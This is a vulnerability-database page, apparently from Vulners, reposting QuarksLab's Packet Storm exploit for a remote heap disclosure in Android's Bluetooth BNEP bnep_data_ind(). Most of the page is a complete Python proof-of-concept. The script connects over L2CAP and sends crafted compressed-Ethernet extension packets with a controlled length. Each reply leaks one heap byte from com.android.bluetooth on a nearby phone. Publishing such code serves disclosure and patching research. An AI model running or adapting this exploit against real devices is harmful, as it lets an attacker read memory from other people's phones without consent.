Lucene search

K

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

πŸ—“οΈΒ 23 Mar 2018Β 00:00:00Reported byΒ QuarksLabTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 62Β Views

Android Bluetooth BNEP bnep_data_ind Remote Heap Disclosure in hciconfi

Show more
Related
Code
ReporterTitlePublishedViews
Family
0day.today
Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit
23 Mar 201800:00
–zdt
0day.today
Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit
23 Mar 201800:00
–zdt
Packet Storm
Android Bluetooth BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-Of-Bounds Read
23 Mar 201800:00
–packetstorm
NVD
CVE-2017-13261
4 Apr 201817:29
–nvd
NVD
CVE-2017-13262
4 Apr 201817:29
–nvd
NVD
CVE-2017-13260
4 Apr 201817:29
–nvd
NVD
CVE-2017-13258
4 Apr 201817:29
–nvd
Prion
Out-of-bounds
4 Apr 201817:29
–prion
Prion
Out-of-bounds
4 Apr 201817:29
–prion
Prion
Out-of-bounds
4 Apr 201817:29
–prion
Rows per page
`import os  
import sys  
import struct  
  
import bluetooth  
  
BNEP_PSM = 15  
BNEP_FRAME_COMPRESSED_ETHERNET = 0x02  
LEAK_ATTEMPTS = 20  
  
def leak(src_bdaddr, dst):  
  
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)  
bnep.settimeout(5)  
bnep.bind((src_bdaddr, 0))  
print 'Connecting to BNEP...'  
bnep.connect((dst, BNEP_PSM))  
bnep.settimeout(1)  
print 'Leaking bytes from the heap of com.android.bluetooth...'  
  
for i in range(LEAK_ATTEMPTS):  
# A byte from the heap at (p + controlled_length) will be leaked  
# if it's greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06).  
# This BNEP packet can be seen in Wireshark with the following info:  
# "Compressed Ethernet+E - Type: unknown[Malformed packet]".  
# The response sent by bnep_send_command_not_understood() contains 3 bytes:  
# 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD) + leaked byte  
  
# 0x82 & 0x80 == 0x80 -> Extension flag = True. 0x82 & 0x7f == 0x2 -> type  
type_and_ext_present = BNEP_FRAME_COMPRESSED_ETHERNET | 0x80  
  
# 0x80 -> ext -> we need to pass this check: !(ext & 0x7f)  
ext = 0x80  
  
# i -> length (the 'p' pointer is advanced by this length)  
  
bnep.send(struct.pack('<BBB', type_and_ext_present, ext, i))  
try:  
data = bnep.recv(3)  
except bluetooth.btcommon.BluetoothError:  
data = ''  
  
if data:  
print 'heap[p + 0x%02x] = 0x%02x' % (i, ord(data[-1]))  
else:  
print 'heap[p + 0x%02x] <= 6' % (i)  
  
print 'Closing connection.'  
bnep.close()  
  
  
def main(src_bdaddr, dst):  
os.system('hciconfig %s sspmode 0' % (src_bdaddr,))  
os.system('hcitool dc %s' % (dst,))  
  
leak(src_bdaddr, dst)  
  
  
if __name__ == '__main__':  
if len(sys.argv) < 3:  
print('Usage: python bnep01.py <src-bdaddr> <dst-bdaddr>')  
else:  
if os.getuid():  
print 'Error: This script must be run as root.'  
else:  
main(sys.argv[1], sys.argv[2])  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Mar 2018 00:00Current
7High risk
Vulners AI Score7
EPSS0.161
62
.json
Report